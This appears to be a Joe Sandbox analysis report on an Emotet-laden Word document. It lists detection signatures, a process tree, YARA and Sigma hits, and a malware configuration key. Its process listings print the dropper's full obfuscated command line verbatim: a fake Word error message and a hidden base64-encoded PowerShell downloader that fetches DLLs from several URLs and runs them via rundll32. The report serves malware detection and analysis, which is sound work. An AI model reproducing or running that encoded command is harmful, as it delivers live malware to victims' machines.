Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report Arch_2021_717-1562532.doc

Overview

General Information

Sample Name:Arch_2021_717-1562532.doc
Analysis ID:344339
MD5:d8358bce25bf7488068cfa9490205833
SHA1:35c09dac297f82402a99de172600ba40d87c3ab7
SHA256:b253cf724dd411f9a433e2595d82ee412c28ae67c09ea0538d382334f2684f10

Most interesting Screenshot:

Detection

Emotet
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
System process connects to network (likely due to code injection or exploit)
Yara detected Emotet
Creates processes via WMI
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Encrypted powershell cmdline option found
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Obfuscated command line found
Potential dropper URLs found in powershell memory
Powershell drops PE file
Sigma detected: Suspicious Call by Ordinal
Sigma detected: Suspicious Encoded PowerShell Command Line
Suspicious powershell command line found
Very long command line found
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Downloads executable code via HTTP
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 2448 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • cmd.exe (PID: 1100 cmdline: cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc UwBFAFQAIAAgACgAIgA1ACIAKwAiAEYAVABzAEcAIgApACAAKAAgAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADQAfQB7ADIAfQAiACAALQBGACAAJwBJAG8ALgAnACwAJwBzAHkAJwAsACcATwByAHkAJwAsACcAcwB0AGUAbQAuACcALAAnAGQASQByAGUAYwB0ACcAKQApACAAOwAgACAAJABxAEUAMwBSADkAPQAgACAAWwBUAHkAUABlAF0AKAAiAHsAMQB9AHsAMAB9AHsANQB9AHsANAB9AHsAMgB9AHsAMwB9ACIALQBmACcAWQAnACwAJwBTACcALAAnAFAAbwBpAE4AdABtAEEAbgAnACwAJwBBAEcARQByACcALAAnAHQARQBtAC4AbgBFAFQALgBTAGUAUgBWAEkAYwBlACcALAAnAHMAJwApACAAIAA7ACQASwBvADMAYQBjADYAMwA9ACQAVAA4ADIASAAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUAA2AF8AUwA7ACQASQA3ADAAWgA9ACgAJwBZADUAJwArACcAMABFACcAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAEUAbQAgACAAKAAiAHYAIgArACIAYQAiACsAIgBSAEkAQQBCAGwAZQA6ADUAIgArACIARgB0AFMAZwAiACkAIAAgACkALgBWAGEAbABVAGUAOgA6ACIAQwByAGAARQBBAHQARQBgAGQAaQByAGUAYABjAHQAbwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAMgBXACcAKwAnAEsAJwArACcAYQBrACcAKQArACgAJwB0AGsAcwB3ACcAKwAnAGUAJwArACcAMgBXACcAKQArACgAJwBBAG4ANgBvAHQAJwArACcAaAAnACkAKwAoACcAaABlACcAKwAnADIAVwAnACkAKQAgACAALQBjAFIARQBQAEwAQQBDAGUAIAAoACcAZQAnACsAJwAyAFcAJwApACwAWwBDAEgAQQBSAF0AOQAyACkAKQA7ACQAVwA5ADAAWAA9ACgAJwBEACcAKwAoACcANgAzACcAKwAnAFQAJwApACkAOwAgACgAVgBhAHIASQBBAEIAbABlACAAUQBlADMAUgA5ACAALQB2AEEATAB1AEUATwBuAGwAIAAgACkAOgA6ACIAUwBgAEUAQwBgAFUAcgBJAHQAYABZAGAAcAByAG8AdABvAEMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAMgBOAD0AKAAnAEoAJwArACgAJwA5ADYAJwArACcAQwAnACkAKQA7ACQAVQBlADcAdgA2AGUAbQAgAD0AIAAoACgAJwBOACcAKwAnADQAOQAnACkAKwAnAEkAJwApADsAJABCADMAMQBDAD0AKAAnAEEAOAAnACsAJwAxAEoAJwApADsAJABRAGYAeAAxADAAeABhAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ASwBhACcAKwAnAGsAdABrAHMAdwB7ACcAKwAnADAAJwArACcAfQAnACsAJwBBAG4AJwArACcANgBvAHQAaABoAHsAMAB9ACcAKQAtAEYAIABbAGMAaABhAFIAXQA5ADIAKQArACQAVQBlADcAdgA2AGUAbQArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQAWQAwADMARQA9ACgAJwBCADMAJwArACcAMwBSACcAKQA7ACQASwAxAGkAdQB4AHgAcAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAFQAYQAxAHkAcwBwADQAPQAoACcAbgBzACcAKwAnACAAJwArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAoACcAbgAnACsAJwBkADoAJwApACsAKAAnAC8AJwArACcALwBzAGgAYQBuACcAKQArACcAbgAnACsAKAAnAGEAcgAnACsAJwBlACcAKQArACcAZAAnACsAKAAnAC4AYwBvAG0ALwBjAG8AJwArACcAbgAnACsAJwB0AGUAJwArACcAbgAnACkAKwAnAHQAJwArACgAJwAvAGwAaAAnACsAJwBBACcAKQArACgAJwBMAGUAJwArACcAUwAnACkAKwAoACcALwAhAG4AJwArACcAcwAnACkAKwAoACcAIAB3AHUAIAAnACsAJwBkAGIAJwApACsAKAAnACAAbgAnACsAJwBkADoAJwApACsAJwAvAC8AJwArACgAJwBqAGUAZQAnACsAJwB2AGEAbgAnACkAKwAoACcAbABpAGMALgBjAG8AbQAvAHcAJwArACcAcAAtACcAKwAnAGMAbwAnACsAJwBuACcAKwAnAHQAZQAnACkAKwAoACcAbgB0ACcAKwAnAC8AJwApACsAKAAnAHIAJwArACcAOABNAC8AIQAnACsAJwBuAHMAJwApACsAKAAnACAAJwArACcAdwB1ACAAJwArACcAZABiACAAbgBkACcAKQArACgAJwA6AC8AJwArACcALwBkACcAKQArACcAYQBzACcAKwAoACcAaAAnACsAJwB1AGQAJwApACsAKAAnAGEAbgBjAGUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB0AGgAJwApACsAJwBpAG4AJwArACgAJwBrAHAAJwArACcAaAAnACsAJwBwAC8AZAAnACkAKwAnAGcAJwArACcAcwAnACsAKAAnADcASgAnACsAJwBtADkAJwApACsAJwAvACcAKwAoACcAIQBuACcAKwAnAHMAIAB3ACcAKQArACgAJwB1ACAAZAAnACsAJwBiACcAKQArACgAJwAgAG4AJwArACcAZAA6AC8AJwArACcALwAnACkAKwAoACcAbAAnACsAJwBlAG8AJwApACsAKAAnAHAAYQByACcAKwAnAGQAYwAnACkAKwAoACcAcgBhAG4AJwArACcAZQBzACcAKQArACgAJwAuAGMAbwAnACsAJwBtAC8AJwArACcAegB5AG4AcQAnACkAKwAnAC0AJwArACcAbAAnACsAKAAnAGkAJwArACcAbgB1ACcAKwAnAHgAJwArACcALQB5AGEAYQB5ACcAKQArACcAZgAvACcAKwAoACcAdwAnACsAJwAvACEAbgAnACkAKwAnAHMAIAAnACsAKAAnAHcAdQAgACcAKwAnAGQAYgAnACsAJwAgACcAKQArACcAbgAnACsAJwBkACcAKwAnADoAJwArACcALwAnACsAKAAnAC8AbQBtAHIAaQBuAGMAJwArACcAcwAuACcAKQArACgAJwBjAG8AJwArACcAbQAnACsAJwAvAGUAdABlAHIAbgBhAGwALQAnACkAKwAoACcAZAAnACsAJwB1AGUAbAAnACkAKwAoACcAaQAnACsAJwBzAHQALQAnACkAKwAoACcAOQBjAHUAJwArACcAcQB2AC8AagAnACkAKwAoACcAeAAnACsAJwBHAFEAagAvACEAJwArACcAbgAnACkAKwAoACcAcwAnACsAJwAgAHcAJwApACsAKAAnAHUAIABkACcAKwAnAGIAIABuAGQAJwArACcAOgAvACcAKQArACgAJwAvADMAJwArACcAbQB1ACcAKwAnAHMAawAnACkAKwAnAGUAdAAnACsAKAAnAGUAZQByACcAKwAnAHMAZQBuAHQALgBuAGUAJwArACcAdAAvACcAKQArACgAJwB3ACcAKwAnAHAALQBpAG4AJwArACcAYwBsAHUAZABlAHMALwBUAFUAJwArACcAZwBEAC8AIQBuACcAKwAnAHMAIAAnACkAKwAnAHcAdQAnACsAJwAgACcAKwAoACcAZAAnACsAJwBiACAAJwApACsAKAAnAG4AZAAnACsAJwBzACcAKQArACgAJwA6ACcAKwAnAC8ALwAnACkAKwAoACcAcwAnACsAJwBrAGkAbABtAHUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB3ACcAKwAnAHAALQBhACcAKQArACcAZAAnACsAKAAnAG0AaQBuAC8AJwArACcAaAAnACsAJwBRACcAKQArACgAJwBWAGwAQgAnACsAJwA4AGIALwAnACkAKQAuACIAcgBgAGUAUABsAEEAYABjAEUAIgAoACgAKAAnAG4AcwAnACsAJwAgACcAKQArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAnAG4AZAAnACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAG4AagAnACwAJwB0AHIAJwApACwAJwB5AGoAJwAsACcAcwBjACcALAAkAEsAMQBpAHUAeAB4AHAALAAnAHcAZAAnACkAWwAzAF0AKQAuACIAUwBwAGAAbABpAFQAIgAoACQARAA1ADQAUwAgACsAIAAkAEsAbwAzAGEAYwA2ADMAIAArACAAJABGADAAOABKACkAOwAkAE8AMQA2AFIAPQAoACcAWAA2ACcAKwAnADIAVgAnACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEoAZAA1AHMAXwBoAGYAIABpAG4AIAAkAFQAYQAxAHkAcwBwADQAKQB7AHQAcgB5AHsAKAAmACgAJwBOAGUAJwArACcAdwAtAE8AJwArACcAYgBqACcAKwAnAGUAYwB0ACcAKQAgAHMAeQBTAFQARQBNAC4ATgBlAFQALgB3AEUAQgBDAEwASQBFAG4AdAApAC4AIgBEAE8AdwBOAGAATABgAG8AQQBgAEQARgBJAGwARQAiACgAJABKAGQANQBzAF8AaABmACwAIAAkAFEAZgB4ADEAMAB4AGEAKQA7ACQATAAyADkARAA9ACgAJwBPADYAJwArACcANABIACcAKQA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAtAEkAJwArACcAdABlACcAKwAnAG0AJwApACAAJABRAGYAeAAxADAAeABhACkALgAiAEwAYABlAG4ARwBgAFQAaAAiACAALQBnAGUAIAA0ADQANwAxADIAKQAgAHsAJgAoACcAcgB1AG4AZAAnACsAJwBsAGwAMwAyACcAKQAgACQAUQBmAHgAMQAwAHgAYQAsACgAJwBBACcAKwAoACcAbgB5AFMAdAAnACsAJwByACcAKQArACgAJwBpACcAKwAnAG4AZwAnACkAKQAuACIAVABvAHMAYABUAFIAaQBgAE4AZwAiACgAKQA7ACQAQgAyADcAQgA9ACgAKAAnAFcANAAnACsAJwAzACcAKQArACcAUwAnACkAOwBiAHIAZQBhAGsAOwAkAFoAOAAxAFYAPQAoACcASQA2ACcAKwAnADIAWQAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEIANQA4AEkAPQAoACcATwAzACcAKwAnADUASQAnACkA MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
    • msg.exe (PID: 1664 cmdline: msg user /v Word experienced an error trying to open the file. MD5: 2214979661E779C3E3C33D4F14E6F3AC)
    • powershell.exe (PID: 2564 cmdline: powershell -w hidden -enc UwBFAFQAIAAgACgAIgA1ACIAKwAiAEYAVABzAEcAIgApACAAKAAgAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADQAfQB7ADIAfQAiACAALQBGACAAJwBJAG8ALgAnACwAJwBzAHkAJwAsACcATwByAHkAJwAsACcAcwB0AGUAbQAuACcALAAnAGQASQByAGUAYwB0ACcAKQApACAAOwAgACAAJABxAEUAMwBSADkAPQAgACAAWwBUAHkAUABlAF0AKAAiAHsAMQB9AHsAMAB9AHsANQB9AHsANAB9AHsAMgB9AHsAMwB9ACIALQBmACcAWQAnACwAJwBTACcALAAnAFAAbwBpAE4AdABtAEEAbgAnACwAJwBBAEcARQByACcALAAnAHQARQBtAC4AbgBFAFQALgBTAGUAUgBWAEkAYwBlACcALAAnAHMAJwApACAAIAA7ACQASwBvADMAYQBjADYAMwA9ACQAVAA4ADIASAAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUAA2AF8AUwA7ACQASQA3ADAAWgA9ACgAJwBZADUAJwArACcAMABFACcAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAEUAbQAgACAAKAAiAHYAIgArACIAYQAiACsAIgBSAEkAQQBCAGwAZQA6ADUAIgArACIARgB0AFMAZwAiACkAIAAgACkALgBWAGEAbABVAGUAOgA6ACIAQwByAGAARQBBAHQARQBgAGQAaQByAGUAYABjAHQAbwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAMgBXACcAKwAnAEsAJwArACcAYQBrACcAKQArACgAJwB0AGsAcwB3ACcAKwAnAGUAJwArACcAMgBXACcAKQArACgAJwBBAG4ANgBvAHQAJwArACcAaAAnACkAKwAoACcAaABlACcAKwAnADIAVwAnACkAKQAgACAALQBjAFIARQBQAEwAQQBDAGUAIAAoACcAZQAnACsAJwAyAFcAJwApACwAWwBDAEgAQQBSAF0AOQAyACkAKQA7ACQAVwA5ADAAWAA9ACgAJwBEACcAKwAoACcANgAzACcAKwAnAFQAJwApACkAOwAgACgAVgBhAHIASQBBAEIAbABlACAAUQBlADMAUgA5ACAALQB2AEEATAB1AEUATwBuAGwAIAAgACkAOgA6ACIAUwBgAEUAQwBgAFUAcgBJAHQAYABZAGAAcAByAG8AdABvAEMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAMgBOAD0AKAAnAEoAJwArACgAJwA5ADYAJwArACcAQwAnACkAKQA7ACQAVQBlADcAdgA2AGUAbQAgAD0AIAAoACgAJwBOACcAKwAnADQAOQAnACkAKwAnAEkAJwApADsAJABCADMAMQBDAD0AKAAnAEEAOAAnACsAJwAxAEoAJwApADsAJABRAGYAeAAxADAAeABhAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ASwBhACcAKwAnAGsAdABrAHMAdwB7ACcAKwAnADAAJwArACcAfQAnACsAJwBBAG4AJwArACcANgBvAHQAaABoAHsAMAB9ACcAKQAtAEYAIABbAGMAaABhAFIAXQA5ADIAKQArACQAVQBlADcAdgA2AGUAbQArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQAWQAwADMARQA9ACgAJwBCADMAJwArACcAMwBSACcAKQA7ACQASwAxAGkAdQB4AHgAcAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAFQAYQAxAHkAcwBwADQAPQAoACcAbgBzACcAKwAnACAAJwArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAoACcAbgAnACsAJwBkADoAJwApACsAKAAnAC8AJwArACcALwBzAGgAYQBuACcAKQArACcAbgAnACsAKAAnAGEAcgAnACsAJwBlACcAKQArACcAZAAnACsAKAAnAC4AYwBvAG0ALwBjAG8AJwArACcAbgAnACsAJwB0AGUAJwArACcAbgAnACkAKwAnAHQAJwArACgAJwAvAGwAaAAnACsAJwBBACcAKQArACgAJwBMAGUAJwArACcAUwAnACkAKwAoACcALwAhAG4AJwArACcAcwAnACkAKwAoACcAIAB3AHUAIAAnACsAJwBkAGIAJwApACsAKAAnACAAbgAnACsAJwBkADoAJwApACsAJwAvAC8AJwArACgAJwBqAGUAZQAnACsAJwB2AGEAbgAnACkAKwAoACcAbABpAGMALgBjAG8AbQAvAHcAJwArACcAcAAtACcAKwAnAGMAbwAnACsAJwBuACcAKwAnAHQAZQAnACkAKwAoACcAbgB0ACcAKwAnAC8AJwApACsAKAAnAHIAJwArACcAOABNAC8AIQAnACsAJwBuAHMAJwApACsAKAAnACAAJwArACcAdwB1ACAAJwArACcAZABiACAAbgBkACcAKQArACgAJwA6AC8AJwArACcALwBkACcAKQArACcAYQBzACcAKwAoACcAaAAnACsAJwB1AGQAJwApACsAKAAnAGEAbgBjAGUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB0AGgAJwApACsAJwBpAG4AJwArACgAJwBrAHAAJwArACcAaAAnACsAJwBwAC8AZAAnACkAKwAnAGcAJwArACcAcwAnACsAKAAnADcASgAnACsAJwBtADkAJwApACsAJwAvACcAKwAoACcAIQBuACcAKwAnAHMAIAB3ACcAKQArACgAJwB1ACAAZAAnACsAJwBiACcAKQArACgAJwAgAG4AJwArACcAZAA6AC8AJwArACcALwAnACkAKwAoACcAbAAnACsAJwBlAG8AJwApACsAKAAnAHAAYQByACcAKwAnAGQAYwAnACkAKwAoACcAcgBhAG4AJwArACcAZQBzACcAKQArACgAJwAuAGMAbwAnACsAJwBtAC8AJwArACcAegB5AG4AcQAnACkAKwAnAC0AJwArACcAbAAnACsAKAAnAGkAJwArACcAbgB1ACcAKwAnAHgAJwArACcALQB5AGEAYQB5ACcAKQArACcAZgAvACcAKwAoACcAdwAnACsAJwAvACEAbgAnACkAKwAnAHMAIAAnACsAKAAnAHcAdQAgACcAKwAnAGQAYgAnACsAJwAgACcAKQArACcAbgAnACsAJwBkACcAKwAnADoAJwArACcALwAnACsAKAAnAC8AbQBtAHIAaQBuAGMAJwArACcAcwAuACcAKQArACgAJwBjAG8AJwArACcAbQAnACsAJwAvAGUAdABlAHIAbgBhAGwALQAnACkAKwAoACcAZAAnACsAJwB1AGUAbAAnACkAKwAoACcAaQAnACsAJwBzAHQALQAnACkAKwAoACcAOQBjAHUAJwArACcAcQB2AC8AagAnACkAKwAoACcAeAAnACsAJwBHAFEAagAvACEAJwArACcAbgAnACkAKwAoACcAcwAnACsAJwAgAHcAJwApACsAKAAnAHUAIABkACcAKwAnAGIAIABuAGQAJwArACcAOgAvACcAKQArACgAJwAvADMAJwArACcAbQB1ACcAKwAnAHMAawAnACkAKwAnAGUAdAAnACsAKAAnAGUAZQByACcAKwAnAHMAZQBuAHQALgBuAGUAJwArACcAdAAvACcAKQArACgAJwB3ACcAKwAnAHAALQBpAG4AJwArACcAYwBsAHUAZABlAHMALwBUAFUAJwArACcAZwBEAC8AIQBuACcAKwAnAHMAIAAnACkAKwAnAHcAdQAnACsAJwAgACcAKwAoACcAZAAnACsAJwBiACAAJwApACsAKAAnAG4AZAAnACsAJwBzACcAKQArACgAJwA6ACcAKwAnAC8ALwAnACkAKwAoACcAcwAnACsAJwBrAGkAbABtAHUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB3ACcAKwAnAHAALQBhACcAKQArACcAZAAnACsAKAAnAG0AaQBuAC8AJwArACcAaAAnACsAJwBRACcAKQArACgAJwBWAGwAQgAnACsAJwA4AGIALwAnACkAKQAuACIAcgBgAGUAUABsAEEAYABjAEUAIgAoACgAKAAnAG4AcwAnACsAJwAgACcAKQArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAnAG4AZAAnACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAG4AagAnACwAJwB0AHIAJwApACwAJwB5AGoAJwAsACcAcwBjACcALAAkAEsAMQBpAHUAeAB4AHAALAAnAHcAZAAnACkAWwAzAF0AKQAuACIAUwBwAGAAbABpAFQAIgAoACQARAA1ADQAUwAgACsAIAAkAEsAbwAzAGEAYwA2ADMAIAArACAAJABGADAAOABKACkAOwAkAE8AMQA2AFIAPQAoACcAWAA2ACcAKwAnADIAVgAnACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEoAZAA1AHMAXwBoAGYAIABpAG4AIAAkAFQAYQAxAHkAcwBwADQAKQB7AHQAcgB5AHsAKAAmACgAJwBOAGUAJwArACcAdwAtAE8AJwArACcAYgBqACcAKwAnAGUAYwB0ACcAKQAgAHMAeQBTAFQARQBNAC4ATgBlAFQALgB3AEUAQgBDAEwASQBFAG4AdAApAC4AIgBEAE8AdwBOAGAATABgAG8AQQBgAEQARgBJAGwARQAiACgAJABKAGQANQBzAF8AaABmACwAIAAkAFEAZgB4ADEAMAB4AGEAKQA7ACQATAAyADkARAA9ACgAJwBPADYAJwArACcANABIACcAKQA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAtAEkAJwArACcAdABlACcAKwAnAG0AJwApACAAJABRAGYAeAAxADAAeABhACkALgAiAEwAYABlAG4ARwBgAFQAaAAiACAALQBnAGUAIAA0ADQANwAxADIAKQAgAHsAJgAoACcAcgB1AG4AZAAnACsAJwBsAGwAMwAyACcAKQAgACQAUQBmAHgAMQAwAHgAYQAsACgAJwBBACcAKwAoACcAbgB5AFMAdAAnACsAJwByACcAKQArACgAJwBpACcAKwAnAG4AZwAnACkAKQAuACIAVABvAHMAYABUAFIAaQBgAE4AZwAiACgAKQA7ACQAQgAyADcAQgA9ACgAKAAnAFcANAAnACsAJwAzACcAKQArACcAUwAnACkAOwBiAHIAZQBhAGsAOwAkAFoAOAAxAFYAPQAoACcASQA2ACcAKwAnADIAWQAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEIANQA4AEkAPQAoACcATwAzACcAKwAnADUASQAnACkA MD5: 852D67A27E454BD389FA7F02A8CBE23F)
      • rundll32.exe (PID: 2736 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString MD5: DD81D91FF3B0763C392422865C9AC12E)
        • rundll32.exe (PID: 2764 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString MD5: 51138BEEA3E2C21EC44D0932C71762A8)
          • rundll32.exe (PID: 2484 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Kaktksw\An6othh\N49I.dll',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
            • rundll32.exe (PID: 2852 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Kvmkgtcj\aykivov.nhj',HGTGPppTjVNX MD5: 51138BEEA3E2C21EC44D0932C71762A8)
              • rundll32.exe (PID: 2856 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Kvmkgtcj\aykivov.nhj',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                • rundll32.exe (PID: 2964 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Unxqf\ouoi.jab',tPlaqqOeWpG MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                  • rundll32.exe (PID: 2968 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Unxqf\ouoi.jab',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                    • rundll32.exe (PID: 2836 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Iemuqepepuxnfb\fiqpbnltnychm.qgs',SlGUqAwWB MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                      • rundll32.exe (PID: 2464 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Iemuqepepuxnfb\fiqpbnltnychm.qgs',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                        • rundll32.exe (PID: 2128 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qzwbjgb\bmqjkk.hhh',AkVsWQgzjbvUf MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                          • rundll32.exe (PID: 3056 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qzwbjgb\bmqjkk.hhh',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
  • cleanup

Malware Configuration

Threatname: Emotet

{"RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAOZ9fLJ8UrI0OZURpPsR3eijAyfPj3z6\nuS75f2igmYFW2aWgNcFIzsAYQleKzD0nlCFHOo7Zf8/4wY2UW0CJ4dJEHnE/PHlz\n6uNk3pxjm7o4eCDyiJbzf+k0Azjl0q54FQIDAQAB"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000B.00000002.2116581505.0000000000240000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
    0000000A.00000002.2113422714.00000000003F0000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
      0000000A.00000002.2113576039.0000000000780000.00000040.00020000.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
        00000008.00000002.2108915228.0000000000260000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
          0000000C.00000002.2120708575.00000000002C0000.00000040.00020000.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
            Click to see the 25 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            8.2.rundll32.exe.2a0000.0.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
              13.2.rundll32.exe.220000.0.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                13.2.rundll32.exe.220000.0.raw.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                  9.2.rundll32.exe.260000.0.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                    7.2.rundll32.exe.1b0000.0.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                      Click to see the 35 entries

                      Sigma Overview

                      System Summary:

                      barindex
                      Sigma detected: Suspicious Call by OrdinalShow sources
                      Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Kaktksw\An6othh\N49I.dll',#1, CommandLine: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Kaktksw\An6othh\N49I.dll',#1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 2764, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Kaktksw\An6othh\N49I.dll',#1, ProcessId: 2484
                      Sigma detected: Suspicious Encoded PowerShell Command LineShow sources
                      Source: Process startedAuthor: Florian Roth, Markus Neis: Data: Command: powershell -w hidden -enc UwBFAFQAIAAgACgAIgA1ACIAKwAiAEYAVABzAEcAIgApACAAKAAgAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADQAfQB7ADIAfQAiACAALQBGACAAJwBJAG8ALgAnACwAJwBzAHkAJwAsACcATwByAHkAJwAsACcAcwB0AGUAbQAuACcALAAnAGQASQByAGUAYwB0ACcAKQApACAAOwAgACAAJABxAEUAMwBSADkAPQAgACAAWwBUAHkAUABlAF0AKAAiAHsAMQB9AHsAMAB9AHsANQB9AHsANAB9AHsAMgB9AHsAMwB9ACIALQBmACcAWQAnACwAJwBTACcALAAnAFAAbwBpAE4AdABtAEEAbgAnACwAJwBBAEcARQByACcALAAnAHQARQBtAC4AbgBFAFQALgBTAGUAUgBWAEkAYwBlACcALAAnAHMAJwApACAAIAA7ACQASwBvADMAYQBjADYAMwA9ACQAVAA4ADIASAAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUAA2AF8AUwA7ACQASQA3ADAAWgA9ACgAJwBZADUAJwArACcAMABFACcAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAEUAbQAgACAAKAAiAHYAIgArACIAYQAiACsAIgBSAEkAQQBCAGwAZQA6ADUAIgArACIARgB0AFMAZwAiACkAIAAgACkALgBWAGEAbABVAGUAOgA6ACIAQwByAGAARQBBAHQARQBgAGQAaQByAGUAYABjAHQAbwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAMgBXACcAKwAnAEsAJwArACcAYQBrACcAKQArACgAJwB0AGsAcwB3ACcAKwAnAGUAJwArACcAMgBXACcAKQArACgAJwBBAG4ANgBvAHQAJwArACcAaAAnACkAKwAoACcAaABlACcAKwAnADIAVwAnACkAKQAgACAALQBjAFIARQBQAEwAQQBDAGUAIAAoACcAZQAnACsAJwAyAFcAJwApACwAWwBDAEgAQQBSAF0AOQAyACkAKQA7ACQAVwA5ADAAWAA9ACgAJwBEACcAKwAoACcANgAzACcAKwAnAFQAJwApACkAOwAgACgAVgBhAHIASQBBAEIAbABlACAAUQBlADMAUgA5ACAALQB2AEEATAB1AEUATwBuAGwAIAAgACkAOgA6ACIAUwBgAEU